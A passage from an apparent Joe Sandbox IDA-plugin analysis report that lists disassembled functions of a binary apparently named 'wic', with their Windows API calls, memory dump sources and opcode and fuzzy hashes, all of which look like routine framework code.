                                                                              • Opcode Fuzzy Hash: 6f72c5f93495890465ca754e7e06cd5ce208c4f5bcbdf5606a02b27b23165baf
                                                                              • Instruction Fuzzy Hash: 4D517EB1A0060AEFDB04EF64C955B9ABBF4FF04304F04816AE90D9B791EB75E911CB91
                                                                              Function 00E81D01 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00E89764: SHGetMalloc.SHELL32(?), ref: 00E89784
                                                                                • Part of subcall function 00E9CC35: __EH_prolog3.LIBCMT ref: 00E9CC3C
                                                                              • LoadIconW.USER32(?,00000080), ref: 00E81D81
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3IconLoadMalloc
                                                                              • String ID: h0H
                                                                              • API String ID: 3946107928-516209883
                                                                              • Opcode ID: e1fe72301d3cf5a4554f8bee6157a23833f90c3648fb5503d340f12af5be67cc
                                                                              • Instruction ID: e2e6c2831dbb3c98a01af461a7cb3d877a5995115ca79d58b87719257d95cdbd
                                                                              • Opcode Fuzzy Hash: e1fe72301d3cf5a4554f8bee6157a23833f90c3648fb5503d340f12af5be67cc
                                                                              • Instruction Fuzzy Hash: C7219F71E402159BCF25FFA0D85ABADB7F4AF04710F0045A9E8097B2C2DF755A44CB90
                                                                              Function 00E880FA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateActCtxWWorker.KERNEL32(?,00E884AA,00000020), ref: 00E88138
                                                                                • Part of subcall function 00E882F6: DeactivateActCtx.KERNEL32(?,00E88161,01003E28,0105FD94,DeactivateActCtx,00000000,?,00E96590,00000000,00000000,00E96546), ref: 00E88317
                                                                                • Part of subcall function 00E882F6: GetProcAddress.KERNEL32(00000000,00000000), ref: 00E88324
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: AddressCreateDeactivateProcWorker
                                                                              • String ID: CreateActCtxW
                                                                              • API String ID: 1192707186-1163823230
                                                                              • Opcode ID: 4113f1b96800bdee3408813ae9fd98bfb905f5a387325130e0976e74c27e51f0
                                                                              • Instruction ID: 048d17fc244fa6b438197dbc6c2904aa4154dbed03775aa252a39cca672e3875
                                                                              • Opcode Fuzzy Hash: 4113f1b96800bdee3408813ae9fd98bfb905f5a387325130e0976e74c27e51f0
                                                                              • Instruction Fuzzy Hash: CDE0DF32A41B346B073336559D0881B3B19AA15BF07401216EC9C7F291CFAD8C0143D0
                                                                              Function 00EA1B4F Relevance: 3.4, APIs: 2, Instructions: 419COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3
                                                                              • String ID:
                                                                              • API String ID: 431132790-0
                                                                              • Opcode ID: 4a7ea044f6a3724522a783ad9016e956d735cb1a89962c1a6de813ca4da1a217
                                                                              • Instruction ID: 5acb7190606ec4940832822720cee040384ac83409af7ae0cd5beb5208bd7ddb
                                                                              • Opcode Fuzzy Hash: 4a7ea044f6a3724522a783ad9016e956d735cb1a89962c1a6de813ca4da1a217
                                                                              • Instruction Fuzzy Hash: 77F16C74A002169FCF19DF68C880BAE77B6BF4A314F145569E816BF291DB38ED41CB90
                                                                              Function 00EA3A3C Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00EA562B: GetWindowLongA.USER32(00000000,000000F0), ref: 00EA5638
                                                                              • GetWindowRect.USER32(?,?), ref: 00EA3A7D
                                                                              • GetWindow.USER32(00000004,00000004), ref: 00EA3A9A
                                                                                • Part of subcall function 00EA579D: IsWindowEnabled.USER32(?), ref: 00EA57A8
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnabledLongRect
                                                                              • String ID:
                                                                              • API String ID: 3170195891-0
                                                                              • Opcode ID: b58b006a8ea8a0cda0d852dbb301e075d4d39eca10b69797a11ef54aeb16a463
                                                                              • Instruction ID: 2764f9fa248be8afc89c24415e7a9f1d25b4cee5c87c33c3f2d6b2c7a24cccd3
                                                                              • Opcode Fuzzy Hash: b58b006a8ea8a0cda0d852dbb301e075d4d39eca10b69797a11ef54aeb16a463
                                                                              • Instruction Fuzzy Hash: 84116A70B00219ABCB15EF64C980A7EB7B9FF4D354F501069E845BB240DB39EE008B50
                                                                              Function 00F44D39 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,00F3DA13,00000000,?,00F3D778,8C3A2C7B,00000000), ref: 00F44D84
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,00000000,?,?,00000000,?,00F3DA13,00000000,?,00F3D778,8C3A2C7B,00000000), ref: 00F44D90
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: a66d696710f686add384876932c22c7f4925a0b87daf6bb4c69b3d2832400a8b
                                                                              • Instruction ID: d90ecfe69695d0665187fa56780d0b567fa2060487d7fd03c114579eec16aa4e
                                                                              • Opcode Fuzzy Hash: a66d696710f686add384876932c22c7f4925a0b87daf6bb4c69b3d2832400a8b
                                                                              • Instruction Fuzzy Hash: 7CF0AF70810358AFCB20FFA4D409B497FFCAF00720F008459F959AB252CB75E851CBA1
                                                                              Function 00E9FDD2 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DefWindowProcA.USER32(?,?,?,?), ref: 00E9FE17
                                                                              • CallWindowProcA.USER32(?,?,?,?,?), ref: 00E9FE20
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: ProcWindow$Call
                                                                              • String ID:
                                                                              • API String ID: 2316559721-0
                                                                              • Opcode ID: d136ca8e52b82f66ea770b601089adb28950b68a036e645a78f25ba654d31ca8
                                                                              • Instruction ID: 9b1f0dfff6acda35ad1f44b5257af2ccd65eed54c0e50c39245ea1a3a0774847
                                                                              • Opcode Fuzzy Hash: d136ca8e52b82f66ea770b601089adb28950b68a036e645a78f25ba654d31ca8
                                                                              • Instruction Fuzzy Hash: B3F0F936200106FFCF164F95D808EA9BB6AFF48361B044025F90596520D736D860EB90
                                                                              Function 00E9BE5E Relevance: 3.0, APIs: 2, Instructions: 15threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00E9BE71
                                                                              • SetWindowsHookExA.USER32(000000FF,00E9C519,00000000,00000000), ref: 00E9BE81
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentHookThreadWindows
                                                                              • String ID:
                                                                              • API String ID: 1904029216-0
                                                                              • Opcode ID: b31a0d2ed61b81e4b83c795376c7a031475906e23b6ac550afef3a4c7551ee21
                                                                              • Instruction ID: 0d479653dde3cacd80e5661aac1236c69008dc5a63f0cf0a5f504cb5a11c2fae
                                                                              • Opcode Fuzzy Hash: b31a0d2ed61b81e4b83c795376c7a031475906e23b6ac550afef3a4c7551ee21
                                                                              • Instruction Fuzzy Hash: E4D0A77A408720BEEF3227707C0DB853A949B05338F121341F5617A1C5C73498824761
                                                                              Function 00E965C2 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3.LIBCMT ref: 00E965C9
                                                                                • Part of subcall function 00E973FE: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003), ref: 00E9745B
                                                                                • Part of subcall function 00E973FE: VerSetConditionMask.KERNEL32(00000000), ref: 00E97463
                                                                                • Part of subcall function 00E973FE: VerifyVersionInfoA.KERNEL32(0000009C,00000003,00000000), ref: 00E97474
                                                                                • Part of subcall function 00E973FE: KiUserCallbackDispatcher.NTDLL(00001000), ref: 00E97485
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: ConditionMask$CallbackDispatcherH_prolog3InfoUserVerifyVersion
                                                                              • String ID:
                                                                              • API String ID: 594580106-0
                                                                              • Opcode ID: 7e547dc31add37247599c5c778e4eec49bdcc3d87c7076ef0358d5fce0f669c7
                                                                              • Instruction ID: 05803df332c932eb1010ebb38171c7eb610c31e5bbf8e6ff14d43429e927c513
                                                                              • Opcode Fuzzy Hash: 7e547dc31add37247599c5c778e4eec49bdcc3d87c7076ef0358d5fce0f669c7
                                                                              • Instruction Fuzzy Hash: C351DBB0906F418FD3A9CF3A85417C6FAE0BF89300F508A2E91EED6261EB746184DF55
                                                                              Function 00E8750F Relevance: 1.6, APIs: 1, Instructions: 66windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 00E87530
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost
                                                                              • String ID:
                                                                              • API String ID: 410705778-0
                                                                              • Opcode ID: 5f7f6e464253571ec212661e9ec01e78af54f0fcfb3ce107ab14a44fb96a121b
                                                                              • Instruction ID: 822d6bfc342111f4660ee7f7b9ad135df56de8c82606478f59939d229664311f
                                                                              • Opcode Fuzzy Hash: 5f7f6e464253571ec212661e9ec01e78af54f0fcfb3ce107ab14a44fb96a121b
                                                                              • Instruction Fuzzy Hash: 4911BF35704615AFCB2AAF69E84496EBBA9FF89360714407AF989D7300DB39DC108F90
                                                                              Function 00E875B6 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3
                                                                              • String ID:
                                                                              • API String ID: 431132790-0
                                                                              • Opcode ID: 080a0f0de3ccaf138cb8e4178bf51bad9648b700d3abbcba19075c5361339166
                                                                              • Instruction ID: 2a26cfb71d8161b244016d1454081d26783cb3dacc354120b639d01ae4792de5
                                                                              • Opcode Fuzzy Hash: 080a0f0de3ccaf138cb8e4178bf51bad9648b700d3abbcba19075c5361339166
                                                                              • Instruction Fuzzy Hash: DC117F34B006218FCF09AB64C855B6D3BA9BF48714F0400A9E98AEB356CF38AC05CF94
                                                                              Function 00E9E06E Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00E86020: FindResourceW.KERNEL32(?,49000000,00000006,?,?,?,80004005,8C3A2C7B,?,?,?,00000000,00FF50D8,000000FF,?,00E87632), ref: 00E86038
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000002,?,00000001,?,00000000,00000000,00000000,?,?,00E9922D,?,?,00000080), ref: 00E9E0B6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharFindMultiResourceWide
                                                                              • String ID:
                                                                              • API String ID: 3726879926-0
                                                                              • Opcode ID: 75f20549758918dd06e788aca57d58a5dff77fc055bdfbd8264842b04dd4e716
                                                                              • Instruction ID: 1c584623761fb82f7060dcb1dd15f564ace001e9159a553a6cdd49e163779635
                                                                              • Opcode Fuzzy Hash: 75f20549758918dd06e788aca57d58a5dff77fc055bdfbd8264842b04dd4e716
                                                                              • Instruction Fuzzy Hash: 22F0F677105319BF8B219FA89C85DABBB9CEE49324311502EFA48A7202DA62EC008370
                                                                              Function 00E8373B Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00E837C2
                                                                                • Part of subcall function 00FCCF0C: std::ios_base::_Tidy.LIBCPMT ref: 00FCCF2C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: std::ios_base::_$Ios_base_dtorTidy
                                                                              • String ID:
                                                                              • API String ID: 3167631304-0
                                                                              • Opcode ID: 5d061d90c0fb1e2e9da93954c75d8a86dfc30df5e729b4114591fffbf04508d0
                                                                              • Instruction ID: 8244fd9b2c5fb2e6ca58f83f1dc7739479d800bc79bc8b6e46933fa5be838612
                                                                              • Opcode Fuzzy Hash: 5d061d90c0fb1e2e9da93954c75d8a86dfc30df5e729b4114591fffbf04508d0
                                                                              • Instruction Fuzzy Hash: C011F575A01259CFDB58DF98D985F98B7B4FB04314F2082A9D80DA7280DB30AA88CF94
                                                                              Function 00E964E9 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateDialogIndirectParamA.USER32(?,?,?,?,?), ref: 00E9652F
                                                                                • Part of subcall function 00E8827B: OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,?,?,00E96518,00000000,01047AD0,00000010,00E95C16,?,?,?,00E958B7,00000000), ref: 00E8828F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDebugDialogIndirectOutputParamString
                                                                              • String ID:
                                                                              • API String ID: 3066322445-0
                                                                              • Opcode ID: 789498b8b6a1ac819b1f8dc5398982e68de0ec57d387c71599b4af1a40b20dc8
                                                                              • Instruction ID: bc6b7821edb62df9c44b63d96b939d2cf26c37278e4a995b8654bd8fc0f57900
                                                                              • Opcode Fuzzy Hash: 789498b8b6a1ac819b1f8dc5398982e68de0ec57d387c71599b4af1a40b20dc8
                                                                              • Instruction Fuzzy Hash: 9601AF72900309EFDF21AF94D805BED77B1FB08326F01492AE511B2190C77E8950DF60
                                                                              Function 00E881CE Relevance: 1.5, APIs: 1, Instructions: 32libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(?,00E86FA8,?,01046E68,00000010,00E87FA9,?,00000000,00000060), ref: 00E8820E
                                                                                • Part of subcall function 00E8827B: OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,?,?,00E96518,00000000,01047AD0,00000010,00E95C16,?,?,?,00E958B7,00000000), ref: 00E8828F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: DebugLibraryLoadOutputString
                                                                              • String ID:
                                                                              • API String ID: 137895185-0
                                                                              • Opcode ID: 55a3bc068938e8f1c5160ec117c4af3fedddda9dbadd5d6b36c222ae34ac76a1
                                                                              • Instruction ID: 2671703b0400422a0d2a0f365f1f1a98eb963a53f2be7b3c60ead6ffd4770d92
                                                                              • Opcode Fuzzy Hash: 55a3bc068938e8f1c5160ec117c4af3fedddda9dbadd5d6b36c222ae34ac76a1
                                                                              • Instruction Fuzzy Hash: 92F04F72D00719DFDF21EF94D905BAD77B0FB54726F40452AE819B61A0CB7A8941CB50
                                                                              Function 00E89764 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
